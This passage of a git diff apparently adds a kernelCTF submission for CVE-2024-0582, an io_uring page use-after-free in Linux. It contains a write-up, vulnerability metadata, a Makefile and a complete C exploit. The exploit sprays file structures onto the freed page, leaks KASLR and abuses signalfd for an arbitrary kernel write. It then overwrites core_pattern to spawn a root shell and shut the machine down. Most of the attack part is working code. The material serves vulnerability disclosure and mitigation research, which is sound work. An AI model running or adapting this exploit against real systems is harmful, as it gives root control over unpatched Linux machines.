0), oo_order(slab->slab.oo)); + + /* IRQs are already off */ + spin_lock(&s->virtual.freed_slabs_lock); + if (oo_order(slab->slab.oo) == oo_order(s->min)) { + list_add(&slab->slab.slab_list, &s->virtual.freed_slabs_min); + } else { + WARN_ON(oo_order(slab->slab.oo) != oo_order(s->oo)); + list_add(&slab->slab.slab_list, &s->virtual.freed_slabs); + } + WRITE_ONCE(s->virtual.nr_freed_pages, s->virtual.nr_freed_pages + + (1UL << slab_order(&slab->slab))); + spin_unlock(&s->virtual.freed_slabs_lock); + } + spin_unlock_irqrestore(&slub_kworker_lock, irq_flags); +} +``` + +As we can see, the freed `virtual_slab` will go to the `virtual.freed_slabs{_min}` of its belonging `kmem_cache` while keeping its `virtual address space`.That's why `SLAB_VIRTUAL` prevents `cross-cache` attack efficiently. + +### Why Page UAF works + +Now it's not hard to get several conclusions: + +- Objects/pages directly allocated from buddy allocator are not protected by `SLAB_VIRTUAL`(true as its name implies). The same range of virtual address can be reused by different objects/pages once the appropriate pages are freed and returned to buddy allocator. +- When a `virtual_slab` is allocated/reused, it will allocate pages from buddy allocator as `backing_folio` and set up ptes between `virt_mapping` and physical pages of `backing_folio`. +- Normally “same order and same migratetype” pages get stored in the PCP list, which allows them to be quickly reused. + +The above is the basic logic of how page UAF (still) works on Google's kernelCTF mitigation instance. 
+ +## Exploit Details + +Pin cpu to a certain core to increase the exploit stability as later we need to play with PCP list: + +```c +static void pin_cpu(int cpu_n, pid_t pid) { + cpu_set_t set; + + CPU_ZERO(&set); + CPU_SET(cpu_n, &set); + + if (sched_setaffinity(pid, sizeof(set), &set) < 0) { + die("sched_setaffinity: %m"); + } +} + +pin_cpu(0, getpid()); +``` + +Setup io_uring: + +```c + struct io_uring_params params = {.flags = IORING_SETUP_NO_SQARRAY}; + int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, ¶ms)); +``` + +Spray pbuf and mmap buffer in order to create multiple single-page UAFs at the same time to increase the exploit stability: + +```c + for (int i = 0; i < SPRAY_PBUF_NUM; i++) { + struct io_uring_buf_reg reg = { + .ring_entries = 1, .bgid = i, .flags = IOU_PBUF_RING_MMAP}; + SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, + ®, 1)); + + pbuf_mappings[i] = + SYSCHK(mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, + IORING_OFF_PBUF_RING + (i << IORING_OFF_PBUF_SHIFT))); + logi("[pbuf %d] mapped at %p", i, pbuf_mappings[i]); + } +``` + +Trigger page UAF: + +```c + for (int i = 0; i < SPRAY_PBUF_NUM; i++) { + struct io_uring_buf_reg unreg = {.bgid = i}; + SYSCHK(syscall(__NR_io_uring_register, uring_fd, + IORING_UNREGISTER_PBUF_RING, &unreg, 1)); + } +``` + +Spray enough `struct file` to reuse the UAF page from PCP list + +```c + char buf[1024] = {}; + for (int i = 0; i < SPRAY_FILE_NUM; i++) { + spray_fds[i] = SYSCHK(open("/tmp/tmp_file", O_RDWR | O_CREAT, 0666)); + // later we can observe the write retval at victim_file->f_pos + SYSCHK(write(spray_fds[i], buf, i)); + } +``` + +Locate victim_file: + +```c + void *victim_file_addr = NULL; + for (int i = 0; i < SPRAY_PBUF_NUM; i++) { + if (victim_file_addr) + break; + for (int j = 0; j < PAGE_SZ; j += ALIGNED_FILE_SZ) { + size_t shmem_file_operations = + *(size_t *)(pbuf_mappings[i] + j + OFFSET_FILE_FOP); + if ((shmem_file_operations & 0xfffff) == + (SHMEM_FILE_OPERATIONS & 0xfffff)) { + victim_file_addr = pbuf_mappings[i] + j; + logi("victim_file_addr %p", victim_file_addr); + break; + } + } + } +``` + +Get victim_file index and leak kaslr: + +```c + size_t victim_file_idx = *(size_t *)(victim_file_addr + OFFSET_FILE_FPOS); + size_t shmem_file_operations = + *(size_t *)(victim_file_addr + OFFSET_FILE_FOP); + size_t kaslr = shmem_file_operations - SHMEM_FILE_OPERATIONS; + size_t signalfd_fops = SIGNALFD_FOPS + kaslr; + size_t core_pattern = CORE_PATTERN + kaslr; + size_t private_data_before = + *(size_t *)(victim_file_addr + OFFSET_FILE_PRIV_DATA); +``` + +Abuse victim_file to get arbitrary write and overwrite the core_pattern: + +```c + *(size_t *)(victim_file_addr + OFFSET_FILE_FOP) = signalfd_fops; + char *fake = "|/proc/%P/fd/666 %P"; + for (int i = 0; i <= strlen(fake); i++) { // include the null byte + *(size_t *)(victim_file_addr + OFFSET_FILE_PRIV_DATA) = (core_pattern + i); + size_t mask = ~fake[i]; + SYSCHK(signalfd(spray_fds[victim_file_idx], (const sigset_t *)&mask, 0)); + } +``` + +This technique can be checked at [Mind the Gap - Project Zero: November 2022](https://googleprojectzero.blogspot.com/2022/11/#:~:text=struct%20was%20incremented.-,Overwriting%20the%20addr_limit,-Like%20many%20previous): + +```c +static int do_signalfd4(int ufd, sigset_t *mask, int flags) +{ + struct signalfd_ctx *ctx; + + /* Check the SFD_* constants for consistency. 
+	 */
+	BUILD_BUG_ON(SFD_CLOEXEC != O_CLOEXEC);
+	BUILD_BUG_ON(SFD_NONBLOCK != O_NONBLOCK);
+
+	if (flags & ~(SFD_CLOEXEC | SFD_NONBLOCK))
+		return -EINVAL;
+
+	sigdelsetmask(mask, sigmask(SIGKILL) | sigmask(SIGSTOP));
+	signotset(mask);
+
+	if (ufd == -1) {
+		ctx = kmalloc(sizeof(*ctx), GFP_KERNEL);
+		if (!ctx)
+			return -ENOMEM;
+
+		ctx->sigmask = *mask;
+
+		/*
+		 * When we call this, the initialization must be complete, since
+		 * anon_inode_getfd() will install the fd.
+		 */
+		ufd = anon_inode_getfd("[signalfd]", &signalfd_fops, ctx,
+				       O_RDWR | (flags & (O_CLOEXEC | O_NONBLOCK)));
+		if (ufd < 0)
+			kfree(ctx);
+	} else {
+		struct fd f = fdget(ufd);
+		if (!f.file)
+			return -EBADF;
+		ctx = f.file->private_data; // <-- get priv_data
+		if (f.file->f_op != &signalfd_fops) {
+			fdput(f);
+			return -EINVAL;
+		}
+		spin_lock_irq(&current->sighand->siglock);
+		ctx->sigmask = *mask; // <-- write here
+		spin_unlock_irq(&current->sighand->siglock);
+
+		wake_up(&current->sighand->signalfd_wqh);
+		fdput(f);
+	}
+
+	return ufd;
+}
+
+SYSCALL_DEFINE4(signalfd4, int, ufd, sigset_t __user *, user_mask,
+		size_t, sizemask, int, flags)
+{
+	sigset_t mask;
+
+	if (sizemask != sizeof(sigset_t))
+		return -EINVAL;
+	if (copy_from_user(&mask, user_mask, sizeof(mask)))
+		return -EFAULT;
+	return do_signalfd4(ufd, &mask, flags);
+}
+```
+
+Note that `sigdelsetmask()`/`signotset()` strip `SIGKILL`/`SIGSTOP` and then invert the user-supplied mask before it is stored in `ctx->sigmask`, which is why the exploit passes `~fake[i]` for each byte it wants to write.
+
+Then we trigger the `core_pattern` handler and execute a program with root privileges:
+
+```c
+// core_pattern exploit taken from
+// https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit.c#L444
+int check_core() {
+  // Check if /proc/sys/kernel/core_pattern has been overwritten
+  char buf[0x100] = {};
+  int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
+  read(core, buf, sizeof(buf));
+  close(core);
+  return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
+}
+
+void crash(char *cmd) {
+  int memfd = memfd_create("", 0);
+  SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff));
+  dup2(memfd, 666);
+  close(memfd);
+  while (check_core() == 0)
+    sleep(1);
+  puts("Root shell !!");
+  /* Trigger program crash and cause kernel to executes program from
+   * core_pattern which is our "root" binary */
+  *(size_t *)0 = 0;
+}
+
+  // trigger core_pattern exploit
+  if (fork() == 0)
+    crash("");
+  while (1)
+    sleep(100);
+```
diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/docs/vulnerability.md
new file mode 100644
index 00000000..8f13fa8b
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/docs/vulnerability.md
@@ -0,0 +1,33 @@
+# Vulnerability
+A page-level use-after-free flaw was found in the Linux kernel's io_uring functionality, in the way a user registers a buffer ring with `IORING_REGISTER_PBUF_RING`, mmaps it, and then frees it.
+ +## Requirements to trigger the vulnerability + - Capabilities: N / A + - Kernel configuration: `CONFIG_IO_URING` + - Are user namespaces needed?: N / A + +## Commit which introduced the vulnerability +[io_uring: add support for user mapped provided buffer ring](https://github.com/torvalds/linux/commit/c56e022c0a27142b7b59ae6bdf45f86bf4b298a1) + +## Commit which fixed the vulnerability + +[io_uring/kbuf: defer release of mapped buffer rings](https://github.com/torvalds/linux/commit/c392cbecd8eca4c53f2bf508731257d9d0a21c2d) + +## Affected kernel versions + +- before 6.6.5 + +## Affected component, subsystem +- io_uring + +## Cause +- UAF + +## Related syscalls + +- io_uring_setup +- io_uring_register + +## CVE URL + +[NVD - cve-2024-0582](https://nvd.nist.gov/vuln/detail/cve-2024-0582) \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/Makefile b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/Makefile new file mode 100644 index 00000000..fc4f5ed7 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/Makefile @@ -0,0 +1,7 @@ +all: exploit + +exploit: exploit.c + gcc -o exploit exploit.c -static + +clean: + rm -rf exploit \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/exploit b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/exploit new file mode 100755 index 00000000..fd5511de Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/exploit.c b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/exploit.c new file mode 100644 index 00000000..447baa0f --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/exploit.c @@ -0,0 +1,254 @@ +#define _GNU_SOURCE +#include <assert.h> +#include <err.h> +#include <fcntl.h> +#include <linux/io_uring.h> +#include <pthread.h> +#include <sched.h> +#include <stdarg.h> +#include <stdint.h> +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <sys/mman.h> +#include <sys/resource.h> +#include <sys/sendfile.h> +#include <sys/signalfd.h> +#include <sys/socket.h> +#include <sys/syscall.h> +#include <sys/un.h> +#include <sys/wait.h> +#include <syscall.h> +#include <unistd.h> + +#define COLOR_GREEN "\033[32m" +#define COLOR_RED "\033[31m" +#define COLOR_YELLOW "\033[33m" +#define COLOR_DEFAULT "\033[0m" + +#define logd(fmt, ...) \ + dprintf(2, "[*] %s:%d " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__) +#define logi(fmt, ...) \ + dprintf(2, COLOR_GREEN "[+] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, \ + __LINE__, ##__VA_ARGS__) +#define logw(fmt, ...) \ + dprintf(2, COLOR_YELLOW "[!] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, \ + __LINE__, ##__VA_ARGS__) +#define loge(fmt, ...) \ + dprintf(2, COLOR_RED "[-] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, \ + __LINE__, ##__VA_ARGS__) +#define die(fmt, ...) 
\ + do { \ + loge(fmt, ##__VA_ARGS__); \ + loge("Exit at line %d", __LINE__); \ + exit(1); \ + } while (0) + +#define SYSCHK(x) \ + ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, "SYSCHK(" #x ")"); \ + __res; \ + }) + +#define SHMEM_FILE_OPERATIONS (0xffffffff82c44a40) +#define SIGNALFD_FOPS (0xffffffff82c4cc80) +#define CORE_PATTERN (0xffffffff83db3720) + +#define SPRAY_PBUF_NUM (0x10) +#define SPRAY_FILE_NUM (0x200) +int spray_fds[SPRAY_FILE_NUM]; +void *pbuf_mappings[SPRAY_PBUF_NUM]; + +#define PAGE_SZ (0x1000) + +#define OFFSET_FILE_FPOS (64) +#define OFFSET_FILE_FOP (176) +#define OFFSET_FILE_PRIV_DATA (200) +#define ALIGNED_FILE_SZ (256) + +// clang-format off +/* +struct file { + union { + struct llist_node f_llist; 0 8 + struct callback_head f_rcuhead __attribute__((__aligned__(8))); 0 16 + unsigned int f_iocb_flags; 0 4 + } __attribute__((__aligned__(8))); 0 16 + spinlock_t f_lock; 16 4 + fmode_t f_mode; 20 4 + atomic_long_t f_count; 24 8 + struct mutex f_pos_lock; 32 32 + --- cacheline 1 boundary (64 bytes) --- + loff_t f_pos; 64 8 + unsigned int f_flags; 72 4 + + XXX 4 bytes hole, try to pack + + struct fown_struct f_owner; 80 32 + const struct cred * f_cred; 112 8 + struct file_ra_state f_ra; 120 32 + --- cacheline 2 boundary (128 bytes) was 24 bytes ago --- + struct path f_path; 152 16 + struct inode * f_inode; 168 8 + const struct file_operations * f_op; 176 8 + u64 f_version; 184 8 + --- cacheline 3 boundary (192 bytes) --- + void * f_security; 192 8 + void * private_data; 200 8 + struct hlist_head * f_ep; 208 8 + struct address_space * f_mapping; 216 8 + errseq_t f_wb_err; 224 4 + errseq_t f_sb_err; 228 4 + + size: 232, cachelines: 4, members: 20 + sum members: 228, holes: 1, sum holes: 4 + forced alignments: 1 + last cacheline: 40 bytes +} __attribute__((__aligned__(8))); +*/ +// clang-format on + +static void pin_cpu(int cpu_n, pid_t pid) { + cpu_set_t set; + + CPU_ZERO(&set); + CPU_SET(cpu_n, &set); + + if (sched_setaffinity(pid, sizeof(set), &set) < 0) { + die("sched_setaffinity: %m"); + } +} + +// core_pattern exploit taken from +// https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit.c#L444 +int check_core() { + // Check if /proc/sys/kernel/core_pattern has been overwritten + char buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, buf, sizeof(buf)); + close(core); + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; +} +void crash(char *cmd) { + int memfd = memfd_create("", 0); + SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff)); + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + puts("Root shell !!"); + /* Trigger program crash and cause kernel to executes program from + * core_pattern which is our "root" binary */ + *(size_t *)0 = 0; +} + +int main(int argc, char **argv) { + if (argc > 1) { + // This section of code will be execute by root! 
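+    // (When /proc/sys/kernel/core_pattern is set to "|/proc/%P/fd/666 %P",
+    //  the kernel runs this binary as the core dump helper and passes the
+    //  crashing process's PID as argv[1]; we steal that process's stdio via
+    //  pidfd_getfd so the root shell below is attached to our terminal.)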
+ int pid = strtoull(argv[1], 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + /* Get flag and poweroff immediately to boost next round try in PR + * verification workflow*/ + system("cat /flag;echo o>/proc/sysrq-trigger;"); + execlp("bash", "bash", NULL); + exit(0); + } + setvbuf(stdout, 0, 2, 0); + + // pin cpu to a certain core to increase the exploit stability as later we + // need to play with PCP list + pin_cpu(0, getpid()); + + // setup io_uring + struct io_uring_params params = {.flags = IORING_SETUP_NO_SQARRAY}; + int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, ¶ms)); + logi("uring_fd = %d", uring_fd); + + // spray pbuf and mmap buffer in order to create multiple single-page UAFs at + // the same time to increase the exploit stability + for (int i = 0; i < SPRAY_PBUF_NUM; i++) { + struct io_uring_buf_reg reg = { + .ring_entries = 1, .bgid = i, .flags = IOU_PBUF_RING_MMAP}; + SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, + ®, 1)); + + pbuf_mappings[i] = + SYSCHK(mmap(NULL, PAGE_SZ, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, + IORING_OFF_PBUF_RING + (i << IORING_OFF_PBUF_SHIFT))); + logi("[pbuf %d] mapped @ %p", i, pbuf_mappings[i]); + } + + // trigger page UAF + for (int i = 0; i < SPRAY_PBUF_NUM; i++) { + struct io_uring_buf_reg unreg = {.bgid = i}; + SYSCHK(syscall(__NR_io_uring_register, uring_fd, + IORING_UNREGISTER_PBUF_RING, &unreg, 1)); + } + + // spray enough `struct file` to reuse the UAF page from PCP list + char buf[1024] = {}; + for (int i = 0; i < SPRAY_FILE_NUM; i++) { + spray_fds[i] = SYSCHK(open("/tmp/tmp_file", O_RDWR | O_CREAT, 0666)); + // later we can observe the write retval at victim_file->f_pos + SYSCHK(write(spray_fds[i], buf, i)); + } + + // locate victim_file + void *victim_file_addr = NULL; + for (int i = 0; i < SPRAY_PBUF_NUM; i++) { + if (victim_file_addr) + break; + for (int j = 0; j < PAGE_SZ; j += ALIGNED_FILE_SZ) { + size_t shmem_file_operations = + *(size_t *)(pbuf_mappings[i] + j + OFFSET_FILE_FOP); + if ((shmem_file_operations & 0xfffff) == + (SHMEM_FILE_OPERATIONS & 0xfffff)) { + victim_file_addr = pbuf_mappings[i] + j; + logi("victim_file_addr %p", victim_file_addr); + break; + } + } + } + + // get victim_file index and leak kaslr + size_t victim_file_idx = *(size_t *)(victim_file_addr + OFFSET_FILE_FPOS); + size_t shmem_file_operations = + *(size_t *)(victim_file_addr + OFFSET_FILE_FOP); + size_t kaslr = shmem_file_operations - SHMEM_FILE_OPERATIONS; + size_t signalfd_fops = SIGNALFD_FOPS + kaslr; + size_t core_pattern = CORE_PATTERN + kaslr; + size_t private_data_before = + *(size_t *)(victim_file_addr + OFFSET_FILE_PRIV_DATA); + logi("victim_file_idx @ 0x%lx", victim_file_idx); + logi("shmem_file_operations @ 0x%lx", shmem_file_operations); + logi("private_data_before @ 0x%lx", private_data_before); + logi("kaslr @ 0x%lx", kaslr); + + // modify victim_file's fops to signalfd_fops + *(size_t *)(victim_file_addr + OFFSET_FILE_FOP) = signalfd_fops; + // fake victim_file's private_data to overwrite core_pattern + char *fake = "|/proc/%P/fd/666 %P"; + for (int i = 0; i <= strlen(fake); i++) { // include the null byte + *(size_t *)(victim_file_addr + OFFSET_FILE_PRIV_DATA) = (core_pattern + i); + size_t mask = ~fake[i]; + SYSCHK(signalfd(spray_fds[victim_file_idx], (const 
sigset_t *)&mask, 0)); + } + + // fix victim_file + *(size_t *)(victim_file_addr + OFFSET_FILE_FOP) = shmem_file_operations; + *(size_t *)(victim_file_addr + OFFSET_FILE_PRIV_DATA) = private_data_before; + + // trigger core_pattern exploit + if (fork() == 0) + crash(""); + while (1) + sleep(100); +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/metadata.json new file mode 100644 index 00000000..4dc8e39b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/metadata.json @@ -0,0 +1,32 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": [ + "exp211" + ], + "vulnerability": { + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c392cbecd8eca4c53f2bf508731257d9d0a21c2d", + "cve": "CVE-2024-0582", + "affected_versions": [ + "6.4 - 6.6.5" + ], + "requirements": { + "attack_surface": [ + "io_uring" + ], + "capabilities": [ + ], + "kernel_config": [ + "CONFIG_IO_URING" + ] + } + }, + "exploits": { + "mitigation-v4-6.6": { + "uses": [ + "io_uring" + ], + "requires_separate_kaslr_leak": false, + "stability_notes": "10 times success per 10 times run" + } + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/original.tar.gz b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/original.tar.gz new file mode 100755 index 00000000..7d21e23c Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/original.tar.gz differ